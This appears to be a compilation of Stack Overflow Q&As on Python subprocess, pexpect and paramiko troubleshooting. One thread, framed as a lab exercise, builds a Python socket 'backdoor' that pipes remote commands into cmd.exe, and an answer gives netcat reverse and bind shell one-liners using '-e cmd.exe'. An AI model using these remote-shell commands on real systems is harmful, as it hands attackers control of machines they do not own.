readline hangs on paramiko.Channel when reading "watch" command output - python

I am testing this code to read the output of the watch command. I suspect it has to do with how watch works, but I can't figure out what's wrong or how to work around it:
import paramiko
host = "micro"
# timeout = 2 # Succeeds
timeout = 3 # Hangs!
command = 'ls / && watch -n2 \'touch "f$(date).txt"\''
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_client.connect(host, password='', look_for_keys=False)
transport = ssh_client.get_transport()
channel = transport.open_session()
channel.get_pty()
channel.settimeout(timeout)
channel.set_combine_stderr(True)
stdout = channel.makefile()
channel.exec_command(command)
for line in stdout: # Hangs here
    print(line.strip())
There are several similar issues, some of them quite old (1, 2, and probably others).
This does not happen with other commands that don't use watch.
Does someone know what's special about this particular command and / or how to reliably set a timeout for the read operation?
(Tested on Python 3.4.2 and paramiko 1.15.1)
Edit 1: I incorporated channel.set_combine_stderr(True) as suggested in this answer to a related question, but it still didn't do the trick. However, watch does produce a lot of output, so perhaps the problem is exactly that. In fact, using this command removed the hanging:
command = 'ls / && watch -n2 \'touch "f$(date).txt"\' > /dev/null'
So this question is probably almost a duplicate of Paramiko ssh die/hang with big output, but it makes me wonder whether there's really no way to use .readline() (called through __next__ in this case), or whether one has to resort to read with a fixed buffer size and assemble the lines manually.

This probably hangs because watch does not produce newlines. If one replaces
for line in stdout:
    print(line.strip())
with a busy loop with
stdout.readline(some_fixed_size)
it can be seen that the bytes never contain a newline character. Therefore, this is a very special case and is not related to other hangs reported in other issues and SO questions.
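For reference, here is a minimal sketch of that fixed-size-read approach, reusing the setup from the question. The 1024-byte chunk size and the decode step are arbitrary choices, not part of the original code:
import socket
import paramiko

ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_client.connect("micro", password='', look_for_keys=False)

channel = ssh_client.get_transport().open_session()
channel.get_pty()
channel.settimeout(3)
channel.set_combine_stderr(True)
channel.exec_command('ls / && watch -n2 \'touch "f$(date).txt"\'')

buffer = b''
try:
    while True:
        chunk = channel.recv(1024)              # fixed-size read instead of readline
        if not chunk:                           # empty read means EOF
            break
        buffer += chunk
        *lines, buffer = buffer.split(b'\n')    # keep any trailing partial line
        for line in lines:
            print(line.decode(errors='replace').strip())
except socket.timeout:
    print("no data received within the timeout")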

Related

Running multiple Bash commands interactively from Python

I have just come across pexpect and have been figuring out how to use it to automate various tasks I would otherwise have to carry out manually in a command shell.
Here's an example script:
import pexpect, sys
child = pexpect.spawn("bash", timeout=60)
child.logfile = sys.stdout
child.sendline("cd /workspace/my_notebooks/code_files")
child.expect('#')
child.sendline('ls')
child.expect('#')
child.sendline('git add .')
child.expect('#')
child.sendline('git commit')
child.expect('#')
child.sendline('git push origin main')
child.expect('Username .*:')
child.sendline(<my_github_username>)
child.expect('Password .*:')
child.sendline(<my_github_password>)
child.expect('#')
child.expect(pexpect.EOF)
(I know these particular tasks do not necessarily require pexpect, just trying to understand its best practices.)
Now, the above works. It cds to my local repo folder, lists the files there, stages my commits, and pushes to Github with authentication, all the while providing real-time output to the Python stdout. But I have two areas I'd like to improve:
Firstly, having .expect('#') between every line I would run in Bash (that doesn't require interactivity) is a little tedious. (And I'm not sure whether / why it always seems to work, whatever the output in stdout was - although so far it does.) Ideally I could just clump them into one multiline string and dispense with all those expects. Isn't there a more natural way to automate parts of the script, e.g. as a multiline string of Bash commands separated by ';' or '&&' or '||'?
Secondly, if you run a script like the above you'll see it times out after 60 seconds sharp, then yields a TimeoutError in Python. Although - assuming the job fits within 60 seconds - it gets done, I would prefer something which (1) doesn't take unnecessarily long, (2) doesn't risk cutting off a >60 second process midway, (3) doesn't end the whole thing giving me an error in Python. Can we instead have it come to a natural end, i.e., when the shell processes are finished, that's when it stops running in Python too? (If (2) and (3) can be addressed, I could probably just set an enormous timeout value - not sure if there is better practice though.)
What's the best way of rewriting the code above? I grouped these two issues in one question because my guess is there is a generally better way of using pexpect, which could solve both problems (and probably others I don't even know I have yet!), and in general I'd invite being shown the best way of doing this kind of task.
You don't need to wait for # between each command. You can just send all the commands and ignore the shell prompts. The shell buffers all the inputs.
You only need to wait for the username and password prompts, and then the final # after the last command.
You also need to send an exit command at the end, otherwise you won't get EOF.
import pexpect, sys
child = pexpect.spawn("bash", timeout=60)
child.logfile = sys.stdout
child.sendline("cd /workspace/my_notebooks/code_files")
child.sendline('ls')
child.sendline('git add .')
child.sendline('git commit')
child.sendline('git push origin main')
child.expect('Username .*:')
child.sendline(<my_github_username>)
child.expect('Password .*:')
child.sendline(<my_github_password>)
child.expect('#')
child.sendline('exit')
child.expect(pexpect.EOF)
If you're running into the 60 second timeout, you can use timeout=None to disable this. See pexpect timeout with large block of data from child
You could also combine multiple commands in a single line:
import pexpect, sys
child = pexpect.spawn("bash", timeout=60)
child.logfile = sys.stdout
child.sendline("cd /workspace/my_notebooks/code_files && ls && git add . && git commit && git push origin main')
child.expect('Username .*:')
child.sendline(<my_github_username>)
child.expect('Password .*:')
child.sendline(<my_github_password>)
child.expect('#')
child.sendline('exit')
child.expect(pexpect.EOF)
Using && between the commands ensures that it stops if any of them fails.
In general I wouldn't recommend using pexpect for this at all. Make a shell script that does everything you want, and run the script with a single subprocess.Popen() call.
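As a rough sketch of that last suggestion (the script name push_notebooks.sh is hypothetical, and how credentials are supplied to git push is left out):
import subprocess

# push_notebooks.sh would contain the cd / ls / git add / git commit / git push steps
proc = subprocess.Popen(["bash", "push_notebooks.sh"])  # output goes straight to the console
returncode = proc.wait()                                # block until the script finishes
if returncode != 0:
    raise RuntimeError("push_notebooks.sh exited with status %d" % returncode)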

Paramiko exec command failure based on time

I have been searching and fooling around with this problem for 2 days now. Firstly, some context in the form of (summarised) code.
def setService(self, ...
    ssh_client = self.conn.get_ssh_client(hostname, username=username, password=password)
    setCommand = str('service ' + service_name + ' ' + status)
    stdin, stdout, stderr = ssh_client.exec_command(setCommand)
    # time.sleep(2)
    return ...
Secondly, the whole codeset uses the same code, and everything works except for these "service foobar stop" and "service foobar start" commands. They cause a Read Error (in ssh/auth.log) and the command does not actually take effect. All other commands using this setup work fine (we do about 10 different commands). It happens on all target machines, from both dev machines, so I am ruling out ssh configs.
But if I add any time-delaying code after the exec_command (in the commented position), it works. A sleep(2), or a loop doing some debug printing, makes it work fine. Read Errors disappear from the auth.log and the service starts/stops as it should. Removing the sleep, or whatever it may be, breaks it again.
We "fixed" it with a hack by leaving a sleep in there, but I do not completely understand why it happens, or why stalling in the function fixes it.
Are we returning too quickly, before the exec has finished on the remote side? I do not think so; it seems to be blocking (returning stdin, stdout, stderr).
Any advice on this would be highly appreciated.
Note: exec_command(command) is non-blocking.
I usually either read the output from the buffer (which consumes some time before returning), or use a time.sleep, as you have done in this case.
If you use stdout.read() or stdout.readlines() (and you should), it forces your script to wait for the output in the stdout buffer, and in turn to wait for exec_command to finish.
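A minimal sketch of that, continuing from the setService code above (using recv_exit_status to wait for completion is my addition, not part of the original answer):
stdin, stdout, stderr = ssh_client.exec_command(setCommand)
exit_status = stdout.channel.recv_exit_status()   # blocks until the remote command has finished
output = stdout.read().decode()                   # draining stdout also prevents returning too early
if exit_status != 0:
    raise RuntimeError('command failed: ' + stderr.read().decode())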

python subprocess stdin.write a string error 22 invalid argument

I have two Python files communicating over a socket. When I pass the data I received to stdin.write, I get error 22, invalid argument. The code:
a="C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a ,universal_newlines = True, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
data = s.recv(1024) # s is the socket i created
proc.stdin.write(data) ##### ERROR in this line
output = proc.stdout.readline()
print output.rstrip()
remainder = proc.communicate()[0]
print remainder
Update
OK, basically I want to create something like a backdoor on a system, in a localhost inside a network lab. This is for educational purposes. I have two machines. 1) is running Ubuntu, and I have this code on the server:
import socket,sys
s=socket.socket()
host = "192.168.2.7" #the servers ip
port = 1234
s.bind((host, port))
s.listen(1) #wait for client connection.
c, addr = s.accept() # Establish connection with client.
print 'Got connection from', addr
c.send('Thank you for connecting')
while True:
    command_from_user = raw_input("Give your command: ") #read command from the user
    if command_from_user == 'quit': break
    c.send(command_from_user) #sending the command to client
c.close() # Close the connection
And I have this code for the client:
import socket
import sys
import subprocess, os
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Socket created'
host = "192.168.2.7" #ip of the server machine
port = 1234
s.connect((host,port)) #open a TCP connection to hostname on the port
print s.recv(1024)
a="C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a ,universal_newlines = True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
while True:
    data = s.recv(1024)
    if (data == "") or (data=="quit"):
        break
    proc.stdin.write('%s\n' % data)
    proc.stdin.flush()
    remainder = proc.communicate()[0]
    print remainder
    stdoutput=proc.stdout.read() + proc.stderr.read()
s.close() #closing the socket
And the error is in the client file:
Traceback (most recent call last):
  File "ex1client2.py", line 50, in <module>
    proc.stdin.write('%s\n' % data)
ValueError: I/O operation on closed file
Basically I want to run commands serially from the server on the client and get the output back to the server. The first command is executed; on the second command I get this error message.
The main problem which led me to this solution is with the change-directory command: when I execute cd "path" it doesn't change the directory.
Your new code has a different problem, which is why it raises a similar but different error. Let's look at the key part:
while True:
    data = s.recv(1024)
    if (data == "") or (data=="quit"):
        break
    proc.stdin.write('%s\n' % data)
    proc.stdin.flush()
    remainder = proc.communicate()[0]
    print remainder
    stdoutput=proc.stdout.read() + proc.stderr.read()
The problem is that each time through this loop, you're calling proc.communicate(). As the docs explain, this will:
Send data to stdin. Read data from stdout and stderr, until end-of-file is reached. Wait for process to terminate.
So, after this call, the child process has quit, and the pipes are all closed. But the next time through the loop, you try to write to its input pipe anyway. Since that pipe has been closed, you get ValueError: I/O operation on closed file, which means exactly what it says.
If you want to run each command in a separate cmd.exe shell instance, you have to move the proc = subprocess.Popen('cmd.exe', …) bit into the loop.
On the other hand, if you want to send commands one by one to the same shell, you can't call communicate; you have to write to stdin, read from stdout and stderr until you know they're done, and leave everything open for the next time through the loop.
The downside of the first one is pretty obvious: if you do a cd \Users\me\Documents in the first command, then dir in the second command, and they're running in completely different shells, you're going to end up getting the directory listing of C:\python27\Tools rather than C:\Users\me\Documents.
But the downside of the second one is pretty obvious too: you need to write code that somehow either knows when each command is done (maybe because you get the prompt again?), or that can block on proc.stdout, proc.stderr, and s all at the same time. (And without accidentally deadlocking the pipes.) And you can't even toss them all into a select, because the pipes aren't sockets. So, the only real option is to create a reader thread for stdout and another one for stderr, or to get one of the async subprocess libraries off PyPI, or to use twisted or another framework that has its own way of doing async subprocess pipes.
If you look at the source to communicate, you can see how the threading should work.
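To make that concrete, here is a rough sketch of the reader-thread idea (drain is a hypothetical helper; the socket protocol and detecting when a command has finished are still left to you):
import subprocess, threading

def drain(pipe, lines):
    # read the pipe to EOF in a background thread so the main loop never blocks on it
    for line in iter(pipe.readline, ''):
        lines.append(line)
    pipe.close()

proc = subprocess.Popen('cmd.exe', universal_newlines=True,
                        stdin=subprocess.PIPE,
                        stdout=subprocess.PIPE, stderr=subprocess.PIPE)

out_lines, err_lines = [], []
for pipe, lines in ((proc.stdout, out_lines), (proc.stderr, err_lines)):
    t = threading.Thread(target=drain, args=(pipe, lines))
    t.daemon = True
    t.start()

proc.stdin.write('dir\n')
proc.stdin.flush()
# ... send further commands here; out_lines / err_lines fill up as output arrives ...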
Meanwhile, as a side note, your code has another very serious problem. You're expecting that each s.recv(1024) is going to return you one command. That's not how TCP sockets work. You'll get the first 2-1/2 commands in one recv, and then 1/4th of a command in the next one, and so on.
On localhost, or even a home LAN, when you're just sending a few small messages around, it will work 99% of the time, but you still have to deal with that 1% or your code will just mysteriously break sometimes. And over the internet, and even many real LANs, it will only work 10% of the time.
So, you have to implement some kind of protocol that delimits messages in some way.
Fortunately, for simple cases, Python gives you a very easy solution to this: makefile. When commands are delimited by newlines, and you can block synchronously until you've got a complete command, this is trivial. Instead of this:
while True:
    data = s.recv(1024)
… just do this:
f = s.makefile()
while True:
    data = f.readline()
You just need to remember to close both f and s later (or s right after the makefile, and f later). A more idiomatic use is:
with s.makefile() as f:
    s.close()
    for data in f:
        pass  # handle one complete, newline-terminated command per iteration
One last thing:
OK basically i want to create something like a backdoor on a system, in a localhost inside a network lab
"localhost" means the same machine you're running one, so "a localhost inside a network lab" doesn't make sense. I assume you just meant "host" here, in which case the whole thing makes sense.
If you don't need to use Python, you can do this whole thing with a one-liner using netcat. There are a few different versions with slightly different syntax. I believe Ubuntu comes with GNU netcat built-in; if not, it's probably installable with apt-get install netcat or apt-get install nc. Windows doesn't come with anything, but you can get ports of almost any variant.
A quick google for "netcat remote shell" turned up a bunch of blog posts, forum messages, and even videos showing how to do this, such as Using Netcat To Spawn A Remote Shell, but you're probably better off googling for netcat tutorials instead.
The more usual design is to have the "backdoor" machine (your Windows box) listen on a port, and the other machine (your Ubuntu box) connect to it, so that's what most of the blog posts/etc. will show you. The advantage of this direction is that your backdoor server listens forever—you can connect up, do some stuff, quit, connect up again later, etc. without having to go back to the Windows box and start a new connection.
But the other way around, with a backdoor client on the Windows box, is just as easy. On your Ubuntu box, start a server that just connects the terminal to the first connection that comes in:
nc -l -p 1234
Then on your Windows box, make a connection to that server, and connect it up to cmd.exe. Assuming you've installed a GNU-syntax variant:
nc -e cmd.exe 192.168.2.7 1234
That's it. A lot simpler than writing it in Python.
For the more typical design, the backdoor server on Windows runs this:
nc -k -l -p 1234 -e cmd.exe
And then you connect up from Ubuntu with:
nc windows.machine.address 1234
Or you can even add -t to the backdoor server, and just connect up with telnet instead of nc.
The problem is that you're not actually opening a subprocess at all, so the pipe is getting closed, so you're trying to write to something that doesn't exist. (I'm pretty sure POSIX guarantees that you'll get an EPIPE here, but on Windows, subprocess isn't using a POSIX pipe in the first place, so there's no guarantee of exactly what you're going to get. But you're definitely going to get some error.)
And the reason that happens is that you're trying to open a program named '\n' (as in a newline, not a backslash and an n). I don't think that's even legal on Windows. And, even if it is, I highly doubt you have an executable named '\n.exe' or the like on your path.
This would be much easier to see if you weren't using shell=True. In that case, the Popen itself would raise an exception (an ENOENT), which would tell you something like:
OSError: [Errno 2] No such file or directory: '
'
… which would be much easier to understand.
In general, you should not be using shell=True unless you really need some shell feature. And it's very rare that you need a shell feature and also need to manually read and write the pipes.
It would also be less confusing if you didn't reuse data to mean two completely different things (the name of the program to run, and the data to pass from the socket to the pipe).

Python - capture Popen stdout AND display on console?

I want to capture stdout from a long-ish running process started via subprocess.Popen(...) so I'm using stdout=PIPE as an arg.
However, because it's a long running process I also want to send the output to the console (as if I hadn't piped it) to give the user of the script an idea that it's still working.
Is this at all possible?
Cheers.
The buffering your long-running sub-process is probably performing will make your console output jerky and very bad UX. I suggest you consider instead using pexpect (or, on Windows, wexpect) to defeat such buffering and get smooth, regular output from the sub-process. For example (on just about any unix-y system, after installing pexpect):
>>> import sys, pexpect
>>> child = pexpect.spawn('/bin/bash -c "echo ba; sleep 1; echo bu"', logfile=sys.stdout); x=child.expect(pexpect.EOF); child.close()
ba
bu
>>> child.before
'ba\r\nbu\r\n'
The ba and bu will come with the proper timing (about a second between them). Note the output is not subject to normal terminal processing, so the carriage returns are left in there -- you'll need to post-process the string yourself (just a simple .replace!-) if you need \n as end-of-line markers (the lack of processing is important just in case the sub-process is writing binary data to its stdout -- this ensures all the data's left intact!-).
S. Lott's comment points to Getting realtime output using subprocess and Real-time intercepting of stdout from another process in Python
I'm curious that Alex's answer here is different from his answer 1085071.
My simple little experiments with the answers in the two other referenced questions has given good results...
I went and looked at wexpect as per Alex's answer above, but I have to say reading the comments in the code I was not left a very good feeling about using it.
I guess the meta-question here is when will pexpect/wexpect be one of the Included Batteries?
Can you simply print it as you read it from the pipe?
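Something like this minimal sketch, for instance (the command is a placeholder; note that the child's own block buffering, which the pexpect answer above works around, can still make the output arrive in bursts):
import subprocess, sys

proc = subprocess.Popen(["some-long-running-command"],
                        stdout=subprocess.PIPE, universal_newlines=True)

captured = []
for line in proc.stdout:          # read lines as the child produces them
    sys.stdout.write(line)        # echo to the console immediately
    captured.append(line)         # and keep a copy for later use
proc.wait()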
Inspired by the pty.openpty() suggestion somewhere above; tested on Python 2.6 and Linux. Publishing it since it took a while to make this work properly, without buffering...
import os, sys

def call_and_peek_output(cmd, shell=False):
    import pty, subprocess
    master, slave = pty.openpty()
    p = subprocess.Popen(cmd, shell=shell, stdin=None, stdout=slave, close_fds=True)
    os.close(slave)
    line = ""
    while True:
        try:
            ch = os.read(master, 1)
        except OSError:
            # We get this exception when the spawned process closes all references to
            # the pty descriptor that we passed it to use for stdout
            # (typically when it and its children exit).
            break
        line += ch
        sys.stdout.write(ch)
        if ch == '\n':
            yield line
            line = ""
    if line:
        yield line
    ret = p.wait()
    if ret:
        raise subprocess.CalledProcessError(ret, cmd)

for l in call_and_peek_output("ls /", shell=True):
    pass
Alternatively, you can pipe your process into tee and capture only one of the streams.
Something along the lines of sh -c 'process interesting stuff' | tee /dev/stderr.
Of course, this only works on Unix-like systems.
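A rough sketch of what that could look like when driven from Python (the inner command is a placeholder, and this assumes /dev/stderr is still attached to the console):
import subprocess

# tee duplicates the child's stdout to stderr (the console) while we capture stdout here
out = subprocess.check_output(
    "some-long-running-command | tee /dev/stderr",
    shell=True, universal_newlines=True)
print("captured %d characters" % len(out))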

Python: cannot read / write in another commandline application by using subprocess module

I am using Python 3.0 on Windows and trying to automate the testing of a commandline application. The user can type commands in the Application Under Test and it returns the output as 2 XML packets: one is a Sent packet and the other one is a Recv packet. By analyzing these packets I can verify the result. I have the code below:
p = subprocess.Popen(SomeCmdAppl, stdout=subprocess.PIPE,
shell = True, stdin=subprocess.PIPE, stderr=subprocess.STDOUT)
p.stdin.write((command + '\r\n').encode())
time.sleep(2.5)
testresult = p.stdout.readline()
testresult = testresult.decode()
print(testresult)
I cannot get any output back. It gets stuck at the place where I try to read the output using readline(). I tried read() and it gets stuck too.
When I run the commandline application manually and type the command, I get the output back correctly as two XML packets, as below:
Sent: <PivotNetMessage>
<MessageId>16f8addf-d366-4031-b3d3-5593efb9f7dd</MessageId>
<ConversationId>373323be-31dd-4858-a7f9-37d97e36eb36</ConversationId>
<SageId>4e1e7c04-4cea-49b2-8af1-64d0f348e621</SagaId>
<SourcePath>C:\Python30\PyNTEST</SourcePath>
<Command>echo</Command>
<Content>Hello</Content>
<Time>7/4/2009 11:16:41 PM</Time>
<ErrorCode>0</ErrorCode>
<ErrorInfo></ErrorInfo>
</PivotNetMessagSent>
Recv: <PivotNetMessage>
<MessageId>16f8addf-d366-4031-b3d3-5593efb9f7dd</MessageId>
<ConversationId>373323be-31dd-4858-a7f9-37d97e36eb36</ConversationId>
<SageId>4e1e7c04-4cea-49b2-8af1-64d0f348e621</SagaId>
<SourcePath>C:\PivotNet\Endpoints\Pipeline\Pipeline_2.0.0.202</SourcePath>
<Command>echo</Command>
<Content>Hello</Content>
<Time>7/4/2009 11:16:41 PM</Time>
<ErrorCode>0</ErrorCode>
<ErrorInfo></ErrorInfo>
</PivotNetMessage>
But when I use communicate() as below, I get the Sent packet and never get the Recv packet. Why am I missing the Recv packet? communicate() is supposed to bring back everything from stdout, right?
p = subprocess.Popen(SomeCmdAppl, stdout=subprocess.PIPE,
shell = True, stdin=subprocess.PIPE, stderr=subprocess.STDOUT)
p.stdin.write((command + '\r\n').encode())
time.sleep(2.5)
result = p.communicate()[0]
print(result)
Can anybody help me with some sample code that should work? I don't know if it is necessary to read and write in separate threads. Please help me. I need to do repeated reads and writes. Is there any advanced-level module in Python I can use? I think the pexpect module doesn't work on Windows.
This is a popular problem, e.g. see:
Interact with a Windows console application via Python
How do I get 'real-time' information back from a subprocess.Popen in python (2.5)
how do I read everything currently in a subprocess.stdout pipe and then return?
(Actually, you should have seen these during creation of your question...?!).
I have two things of interest:
p.stdin.write((command + '\r\n').encode()) is also buffered so your child process might not even have seen its input. You can try flushing this pipe.
In one of the other questions one suggested doing a stdout.read() on the child instead of readline(), with a suitable amount of characters to read. You might want to experiment with this.
Post your results.
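A minimal sketch combining both suggestions, continuing from the question's code (so p, command, and time are as defined there; the 4096-byte size is an arbitrary choice, and read(n) can still block if the application has written fewer bytes, so experiment with the size):
p.stdin.write((command + '\r\n').encode())
p.stdin.flush()                  # make sure the child actually sees the input
time.sleep(2.5)
chunk = p.stdout.read(4096)      # read a bounded amount instead of waiting for a full line
print(chunk.decode())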
Try sending your input using communicate instead of using write:
result = p.communicate((command + '\r\n').encode())[0]
Have you considered using pexpect instead of subprocess? It handles the details which are probably preventing your code from working (like flushing buffers, etc). It may not be available for Py3k yet, but it works well in 2.x.
See: http://pexpect.sourceforge.net/pexpect.html
